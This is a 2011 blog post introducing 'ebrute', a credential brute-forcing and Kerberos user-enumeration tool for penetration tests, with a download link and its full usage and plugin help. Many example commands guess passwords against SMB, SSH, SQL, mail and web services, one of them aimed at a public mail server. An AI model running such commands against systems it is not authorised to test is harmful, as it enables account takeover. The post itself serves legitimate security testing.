Tuesday, 6 December 2011

ebrute - service brute-forcer


I thought it was about time that I released my service brute-forcer. It does a lot of what the other brute-forcers do but has some nice features which I find essential on pen tests. In particular, I wrote a kerberos enumeration plugin which allows you to validate the existence of user accounts on locked down (no enumeration over null sessions or via RID cycling) Windows 2k/2k3/2k8 domain controllers without using a password guess. On a decent server you can validate over a million user accounts a minute and with some clever dictionaries typically obtain around 70% of the domain user accounts. See the blog post for more details. Key features:

Large protocol support
  • FTP
  • FINGER (used for seeing output e.g. root@ etc.)
  • KERBENUM (Fast username validation without using a password guess against Windows2k/2k3/2k8 Domain Controllers)
  • KERBAUTH (Fast authentication on Domain Controllers)
  • LDAP (Nearly as fast domain/non-domain brute force)
  • Local authentication (quick priv esc approx 800,000 guesses a minute)
  • MSSQL (raw TDS, ODBC, OLEDB and managed driver support to try and prevent any strange failures)
  • MYSQL
  • Oracle password checking (turns it from a ~4meg app to ~80meg :-( so this is temporarily out)
  • Oracle SID brute forcing (turns it from a ~4meg app to ~80meg :-( so this is temporarily out)
  • POP3
  • POSTGRES
  • Process (shell your own processes and look at the exit code)
  • SMB via the API(LM, NTLM and more importantly NTLMv2)
  • SMB via raw packets (LMv2 and NTLMv2 with dictionary/hashes)
  • SMTP (BASIC, cram, NTLM)
  • SNMP (v2 comminity name support only at the sec)
  • SSH (2 implementations, both seem similar but sometimes one works better than the other)
  • TFTP (brute force valid files)
  • VMWARE (virtual centre and ESX server authentications)
  • VNC
  • WMI useful if you only have TCP port 135 open
  • WWW (BASIC, DIGEST, NTLM and more importantly NTLMv2)
  • Also some quick fuzzers, random TCP/UDP data, random TCP data with a valid TKPT header 
Decent feedback
  • Tells you progress each minute with and estimated finish time
  • Pause and resume the job - useful if looking at wireshark or temporarily switching VLANs (p key)
  • Increase and Decrease the threads mid flow (-+ keys)
  • Press any key for instant updates
  • Increase and decrease debug level while it is running (v/b)
  • Says why things are succeeding/failing, i.e. not just that it failed
  • Attempts to tell you if remote auth is even enabled (e.g. mssql, mysql, postgres)
  • Optionally log all output to a file  
Powerful username, password and host inputs
  • read a single user or pass
  • read a users or passes from file
  • prefix a constant onto a username or pass
  • add a constant onto the end of a username or pass
  • set min max lengths for user and pass inputs
  • switch for checking for blank and or joey passwords
  • input users and passes from a list
  • read a single host
  • read hosts from a file
  • use hosts and services specified from nmap/nessus output
Other bits
  • Shared password optimization (i.e. spread your attempts across hosts sharing the same creds like a local admin pass...)
  • Port scanner built in so just give it a range e.g. 192.168.8.1-254
  • Auto retries on failed attempts 5 times
  • Configurable port, ssl options and timeouts (although not all plugins support this at the sec)
  • Save the progress at any time by pressing F12
  • Requires .net framework 2 or above.
Limitations and future work
  • Loads all the passwords at the start so it's a proper memory hog.
  • Probably a million bugs - just let me know.
Download:
http://www.r00t.tv/p/downloads.html

Details:

C:\tools\dev\br>ebrute.exe
ebrute v0.76 - Edward Torkington
Usage: ebrute.exe -r [plugin] [options] [-u user|-U userfile] [-p pass|-P passfile] [-h host/hostrange|-H hostfile]
  -u    Username (, separated)
  -U    File containing usernames
  -up   Username prefix
  -us   Username suffix
  -uml  Username min length
  -uxl  Username max length
  -p    Password (, separated)
  -P    File containing passwords
  -pp   Password prefix
  -ps   Password suffix
  -pml  Password min length
  -pxl  Password max length
  -h    Host or range (nmap style)
  -H    File containing hosts
  -s    Connect via SSL
  -pn   Port number if not default
  -c    File, colon separated 'login:pass' format, instead of -U/-P options
  -R    File, with restore information saved via F12
  -j    Joey check
  -n    Null/blank check
  -S    Shared passwords optimisation
  -t    Number of threads [1].
  -d    Check all passwords for each user (default removes user after success)
  -un   Always perform uniqueness checks (default <5000 items otherwise slow startup...)
  -df   Disable the user filter (ignores guest, support, kerberos, IIS accounts etc...)
  -a    Disable host connectivity checks
  -l    File to output log to
  -sr   Max retries for scanner to determine if the service is alive [3]
  -sr   Max timeout in ms for scanner to determine if the service is alive [500]
  -jp   Just print out the attempts to be made
  -v    Verbose
  -vv   Very Verbose
  -vvv  Very Very Verbose
  -e    Extra parameters to pass to plugin
  -de   Forced delay between tasks (ms)
  -r    plugin - see below
  -rr   view detailed plugin help
finger ftp kerbauth kerbenum kerbenumtcp ldap lw mssql
mssqlodbc mssqlole mssqlmanaged mysql pop3 postgres process smbrawlmv2sh
smbrawlmv2mh smbrawntlmv2mh smbapilm smbapintlm smbapintlmv2 smtplogin smtpcram smtpntlm
smtpntlmbasic snmp ssh sshalt tcpfuzzerrandom tkpt tkptrandom tftp
udpfuzzerrandom vmware vnc wmi wwwbasic wwwdigest wwwntlm wwwntlmv2


  Keys during tasks
        v to increase debug level
        b to decrease debug level
        + to increase active threads
        - to decrease active threads
        p to pause/resume current job
        s to show authentication successes so far
        d to delete an IP address from the list
        F12 to save current progress, resume with parameter -R.
        Control + c to quit nicely (hold down to force!)


ERROR: No hosts specified.

C:\tools\dev\br>ebrute -rr
ebrute v0.76 - Edward Torkington
Usage: ebrute.exe -r [plugin] [options] [-u user|-U userfile] [-p pass|-P passfile] [-h host/hostrange|-H hostfile]
  -u    Username (, separated)
  -U    File containing usernames
  -up   Username prefix
  -us   Username suffix
  -uml  Username min length
  -uxl  Username max length
  -p    Password (, separated)
  -P    File containing passwords
  -pp   Password prefix
  -ps   Password suffix
  -pml  Password min length
  -pxl  Password max length
  -h    Host or range (nmap style)
  -H    File containing hosts
  -s    Connect via SSL
  -pn   Port number if not default
  -c    File, colon separated 'login:pass' format, instead of -U/-P options
  -R    File, with restore information saved via F12
  -j    Joey check
  -n    Null/blank check
  -S    Shared passwords optimisation
  -t    Number of threads [1].
  -d    Check all passwords for each user (default removes user after success)
  -un   Always perform uniqueness checks (default <5000 items otherwise slow startup...)
  -df   Disable the user filter (ignores guest, support, kerberos, IIS accounts etc...)
  -a    Disable host connectivity checks
  -l    File to output log to
  -sr   Max retries for scanner to determine if the service is alive [3]
  -sr   Max timeout in ms for scanner to determine if the service is alive [500]
  -jp   Just print out the attempts to be made
  -v    Verbose
  -vv   Very Verbose
  -vvv  Very Very Verbose
  -e    Extra parameters to pass to plugin
  -de   Forced delay between tasks (ms)
  -r    plugin - see below
  -rr   view detailed plugin help

Name:         finger
Description:  Finger enumeration plugin
Extra params: Specify any char to enable fast mode. Warning it can temporarily kill the service!
Examples:     -r finger -P fingerids.txt -h 10.0.0.1

Name:         ftp
Description:  FTP plugin
Extra params: None
Examples:     -r=ftp -u=administrator -P=c:\passes.txt -h=10.0.0.1 -t=8

Name:         kerbauth
Description:  Kerberos authentication plugin [2k3/2k8]
Extra params: [REQUIRED] Windows domain
Examples:     -r kerbauth -e shcdomain -u administrator,admin -P passes.txt -h 10.0.0.1

Name:         kerbenum
Description:  Kerberos user enumeration plugin [2k3/2k8]
Extra params: [REQUIRED] Windows domain
Examples:     -r=kerbenum -e=rootmedomain -P=c:\userlist.txt -h=10.0.0.1 -t=16

Name:         kerbenumtcp
Description:  Kerberos user enumeration plugin (TCP) [2k3/2k8]
Extra params: [REQUIRED] Windows domain
Examples:     -r=kerbenum -e=rootmedomain -P=c:\userlist.txt -h=10.0.0.1 -t=16

Name:         ldap
Description:  ldap plugin [2k3]
Extra params: The Windows domain (essential for windows auth!)
Examples:     -r=ldap -u=administrator -P=c:\passes.txt -h=10.0.0.1 -t=8 -e=win2k3r2domain

Name:         lw
Description:  Local Windows plugin
Extra params: None
Examples:     -r=lw -u=administrator -P=c:\passes.txt -h=127.0.0.1 -t=8

Name:         mssql
Description:  MSSQL SQL Server auth plugin (raw!)
Extra params: None
Examples:     -r=mssql -u=sa -P=c:\passes.txt -h=10.0.0.1 -t=16

Name:         mssqlodbc
Description:  MSSQL SQL Server auth plugin (ODBC connection)
Extra params: None
Examples:     -r=mssqlodbc -u=sa -P=c:\passes.txt -h=10.0.0.1 -t=16

Name:         mssqlole
Description:  MSSQL SQL Server auth plugin (OLEDB Connection)
Extra params: None
Examples:     -r=mssqlole -u=sa -P=c:\passes.txt -h=10.0.0.1 -t=16

Name:         mssqlmanaged
Description:  MSSQL SQL Server auth plugin (Managed Code)
Extra params: None
Examples:     -r=mssqlmanaged -u=sa -P=c:\passes.txt -h=10.0.0.1 -t=16

Name:         mysql
Description:  MySQL SQL Server auth plugin
Extra params: None
Examples:     -r=mysql -u=root -P=c:\passes.txt -h=10.0.0.1 -t=4

Name:         pop3
Description:  POP3 plugin
Extra params: If IIS, fully qualified domain, e.g. example.com
Examples:     -r pop3 -h 74.125.79.109 -s -u test@gmail.com -P passes.txt

Name:         postgres
Description:  Postgres SQL Server auth plugin
Extra params: None
Examples:     -r=postgres -u=postgres -P=c:\passes.txt -h=10.0.0.1 -j -n -t=4

Name:         process
Description:  External process plugin
Extra params: postiveExitCode:::command .e.g.
Examples:     -e=1:::a.exe -a -u #user# -p #pass# -pn #port# -e #extra#

Name:         smbrawlmv2sh
Description:  SMB Raw LMv2 plugin [prob more XP/Vista/W2K3/W2K8 any LM setting, single host only!]
Extra params: None
Examples:     -r=smbrawlmv2 -u=administrator -P=c:\passes.txt -h=10.0.0.1 -t=8

Name:         smbrawlmv2mh
Description:  SMB Raw LMv2 plugin (ensures a single thread per host)
Extra params: None
Examples:     -r=smbrawlmv2mh -u=administrator -P=c:\passes.txt -h=10.0.0.1 -t=8

Name:         smbrawntlmv2mh
Description:  SMB Raw NTLMv2 plugin [no vista/2k8 support + ensures single thread per host]
Extra params: None
Examples:     -r=smbrawntlm2single -u=administrator -P=c:\passes.txt -h=10.0.0.1 -t=8

Name:         smbapilm
Description:  SMB plugin (LM lm=0 compatible with 0,1,2 and 3)
Extra params: Domain, e.g. companyx
Examples:     -r=smbapilm -u=administrator -P=c:\passes.txt -h=10.0.0.1 -t=1

Name:         smbapintlm
Description:  SMB plugin (NTLM lm=2 compatible with 3,4 and 5)
Extra params: Domain, e.g. companyx
Examples:     -r=smbapintlm -U=c:\users.txt -P=c:\passes.txt -h=10.0.0.1 -t=1

Name:         smbapintlmv2
Description:  SMB plugin (NTLM2 lm=5 compatible with 0,1,2,3,4 and 5, supposedly!)
Extra params: Domain, e.g. companyx
Examples:     -r=smbapintlmv2 -U=c:\users.txt -P=c:\passes.txt -h=10.0.0.1 -t=1

Name:         smtplogin
Description:  SMTP login auth plugin [login is an authentication type like NTLM]
Extra params: Fully qualified domain, e.g. example.com (NOT REQUIRED BUT MAY BE USEFUL)
Examples:

Name:         smtpcram
Description:  SMTP CRAM-MD5 auth plugin
Extra params: Fully qualified domain, e.g. example.com (NOT REQUIRED BUT MAY BE USEFUL)
Examples:

Name:         smtpntlm
Description:  SMTP NTLM auth plugin
Extra params: Fully qualified domain, e.g. example.com (NOT REQUIRED BUT MAY BE USEFUL)
Examples:

Name:         smtpntlmbasic
Description:  SMTP NTLM/Basic auth plugin [w2k]
Extra params: None
Examples:

Name:         snmp
Description:  SNMP plugin
Extra params: None
Examples:     -r=snmp -P=c:\passes.txt -h=10.0.0.1 -d -t=16

Name:         ssh
Description:  SSH auth plugin
Extra params: None
Examples:     -r=ssh -u=root -P=c:\passes.txt -h=10.0.0.1 -t=10

Name:         sshalt
Description:  SSH alternate auth plugin, multiple auths/connect - slighly faster for one user
Extra params: None
Examples:     -r=sshalt -u=root -P=c:\passes.txt -h=10.0.0.1 -t=10

Name:         tcpfuzzerrandom
Description:  TCP Fuzzer Random plugin
Extra params: Max data length
Examples:     -r=tcpfuzzerrandom -P=c:\passes.txt -h=10.0.0.1 -t=8

Name:         tkpt
Description:  TKPT plugin
Extra params: None
Examples:     -r=tkpt -P=c:\passes.txt -h=10.0.0.1 -t=8

Name:         tkptrandom
Description:  TKPT random data plugin
Extra params: None
Examples:     -r=tkptrandom -P=c:\passes.txt -h=10.0.0.1 -t=8

Name:         tftp
Description:  TFTP plugin
Extra params: Optional path prefix, e.g. /etc/  (tip: watch windows firewall)
Examples:     -r=tftp -P=c:\unix_just_files.txt -h=10.0.0.1 -t=16

Name:         udpfuzzerrandom
Description:  UDP Fuzzer Random plugin
Extra params: Max data length
Examples:     -r=udpfuzzerrandom -P=c:\passes.txt -h=10.0.0.1 -t=8

Name:         vmware
Description:  VMware ESX/VC plugin
Extra params: None
Examples:     -r=vmware -u=root -P=c:\passes.txt -h=10.0.0.1 -s -t=4

Name:         vnc
Description:  VNC plugin
Extra params: None
Examples:

Name:         wmi
Description:  WMI plugin
Extra params: The wmi end point, defaults to \ROOT\CIMV2
Examples:     -r=wmi -u=administrator -P=c:\passes.txt -h=10.0.0.1 -t=8

Name:         wwwbasic
Description:  WWW basic auth plugin
Extra params: Domain, e.g. companyx
Examples:     -r wwwbasic -U c:\users.txt -P c:\passes.txt -h http://10.0.0.1:8080 -e windowsdomain

Name:         wwwdigest
Description:  WWW digest auth plugin
Extra params: Domain, e.g. companyx
Examples:     -r wwwdigest -U c:\users.txt -P c:\passes.txt -h http://10.0.0.1:8080 -e windomain

Name:         wwwntlm
Description:  WWW NTLM auth plugin
Extra params: Domain, e.g. companyx
Examples:     -r wwwntlm -U c:\users.txt -P c:\passes.txt -h http://10.0.0.1:8080 -e awindomain

Name:         wwwntlmv2
Description:  WWW NTLMv2 auth plugin
Extra params: Domain, e.g. companyx
Examples:     -r wwwntlmv2 -h 10.9.9.1 -u administrator -p blah -e win2k3r2domain -t 8

  Keys during tasks
        v to increase debug level
        b to decrease debug level
        + to increase active threads
        - to decrease active threads
        p to pause/resume current job
        s to show authentication successes so far
        d to delete an IP address from the list
        F12 to save current progress, resume with parameter -R.
        Control + c to quit nicely (hold down to force!)

No comments:

Post a Comment